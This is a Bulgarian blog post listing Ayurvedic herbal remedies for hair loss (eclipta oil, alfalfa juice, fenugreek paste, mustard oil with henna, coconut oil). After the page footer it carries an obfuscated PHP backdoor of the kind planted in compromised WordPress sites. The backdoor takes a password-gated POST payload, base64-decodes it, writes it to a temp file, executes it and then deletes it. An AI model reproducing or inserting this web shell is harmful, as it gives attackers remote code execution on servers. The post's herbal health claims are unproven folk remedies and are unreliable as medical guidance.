Рецепти от Аюрведа при косопад | Косопад

Рецепти от Аюрведа при косопад

аюрведаАюрведа е познанието за живота, събирано през вековете от индийските мъдреци. Науката за правилния начин включва цялостен подход за лечение на често срещани заболявания и състояния като косопад, затлъстяване, сърдечни проблеми и много други.

При проблеми с косата, Аюрведа подхожда обичайно с комбинация от въвеждане на строга здравословна диета, третиране и прием с билки, йога, медитация и аюрведичен масаж.

Представяме ви най – често използваните билки срещу косопад в индийската народна медицина Аюрведа, но преди да ги приложите върху себе си, задължително се консултирайте с лекар.

Еклипта алба

Маслото от еклипта алба е изключително популярно средство на Аюрведа за лечение на косопад. целебните му свойства се дължат на химическо съединение, наподобяващо по своя състав женският полов хормон естроген. Смята се особено подходящо за жени, предписва се и като средство за подмладяване. При третиране се нанася директно върху скалпа с енергични масажиращи движения. Престоява една нощ и на сутринта косата се мие с шампоан.

Сок от алфалфа срещу косопад

Друго популярно средство за превенция е приемът на сок от алфалфа, моркови и маруля, който трябва да се консумира ежедневно. Алфалфа съдържа в себе си големи концентрации на желязо и фитоестрогени, също така е богата на витамини и други минелрали. Коригиране дефицита на желязо мед спомага за борба с оплешивяването.

Винга мунго и сминдух

Сместа от винга мунго (индийско растение) и сминдух е друго известно лекарство на Аюрведа. За приготвянето му се изискват пресни зърна от екзотичната билка, които трябва да се смесят с пресен сминдух. Бъркат се, докато станат на паста. После се маже върху кожата на главата и след няколко минути се изплаква. Прави се 2-3 пъти седмично.

Синапено масло и къна

Това са две от най – популярните съставки за лечение косопад в аюрведичната медицина. Смята се, че насърчават растежа на косата. Загрейте чаша синапено масло и към нея добавете четири супени лъжици листа от къна. Оставате сместа на слаб огън за около пет минути, свалете от котлона и прецедете. Прелейте течността в затворен съд и третирайте по един път на ден.

Кокосово масло

Друг аюрведичен цяр срещу косопад. Препоръчва се втриване в скалпа и кожата на краката всяка вечер преди лягане, задължителен е и продължителен (поне 10-15 мин. масаж). Благотворното му действие се дължи на способността да засили циркулацията на кръв към космените фоликули и по този начин да стимулира растежа.

20. септември 2013 11:44:16 от Косопад
Категории: Рецепти при косопад | Етикети: | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}